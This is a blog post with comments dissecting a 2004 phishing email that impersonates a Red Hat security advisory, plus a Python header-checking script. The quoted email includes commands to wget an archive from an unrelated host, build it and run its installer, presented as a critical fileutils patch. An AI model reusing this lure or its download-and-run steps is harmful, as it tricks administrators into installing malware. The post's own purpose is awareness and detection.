Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Very credible looking, except for a few little niggles:
Received: from mail.forcartex.com.tw (unknown
[211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id
A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004
03:11:53 -0400 (EDT)
Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML links to Redhat’s real logo, linked from a Redhat server, and they even ran their HTML through Tidy!
Let’s be careful out there!
:: Dave Walker 23:55 (EST/EDT) [+] ::
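The two giveaways in the message, the relay named in the Received header and the download host in the instructions, can be checked mechanically. This Python example is added here and is not part of the original post; it reuses the header and wget line quoted above, and the function names and the `redhat.com` vendor-domain argument are assumptions made for illustration.

```python
import re
from email import message_from_string

# Constructed message: the Received header and the wget line are the ones
# quoted in the post; all other headers are omitted.
RAW = """\
Received: from mail.forcartex.com.tw (unknown
 [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id
 A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004
 03:11:53 -0400 (EDT)

First download the patch from the Stanford RedHat mirror:
wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
"""

# Postfix form: from <HELO name> (<verified hostname or "unknown"> [<client IP>])
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s*\[([0-9a-fA-F.:]+)\]\)")
FETCH_RE = re.compile(r"\b(?:wget|curl)\s+(?:\w+://)?([^/\s]+)")


def under(host, domain):
    """True if host is domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def audit(raw, vendor_domain):
    """Return reasons the message does not look like it came from vendor_domain."""
    msg = message_from_string(raw)
    findings = []
    # Only the topmost Received header was written by our own MTA; earlier
    # ones are supplied by the sender and can be forged.
    hops = msg.get_all("Received") or []
    m = RECEIVED_RE.search(" ".join(hops[0].split())) if hops else None
    if m:
        helo, rdns, ip = m.groups()
        # The HELO name is sender-chosen: a match proves nothing, a mismatch is a signal.
        if not under(helo, vendor_domain):
            findings.append(f"relay {helo} [{ip}] is not under {vendor_domain}")
        if rdns == "unknown":
            findings.append(f"Postfix could not verify a hostname for {ip}")
    for host in FETCH_RE.findall(msg.get_payload()):
        if not under(host, vendor_domain):
            findings.append(f"download host {host} is not under {vendor_domain}")
    return findings


if __name__ == "__main__":
    for finding in audit(RAW, "redhat.com"):
        print("SUSPICIOUS:", finding)
```

Run against the quoted message, all three checks fire: the relay is outside the vendor's domain, Postfix recorded no verified hostname for the client address, and the "patch" is fetched from a personal directory on an unrelated host.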
Comments:
That and the fact that ls and mkdir have absolutely no network code. :)
Title: Red Hat Social Exploit Deconstruction
Morning my loyal readers, today I plan to deconstruct the recent Social Engineering email that has been circulating the net today. There are no known users who have fallen for this phishing trick, yet it is possible that it has affected someone. ...
Title: On /. now...
It’s evolved a bit.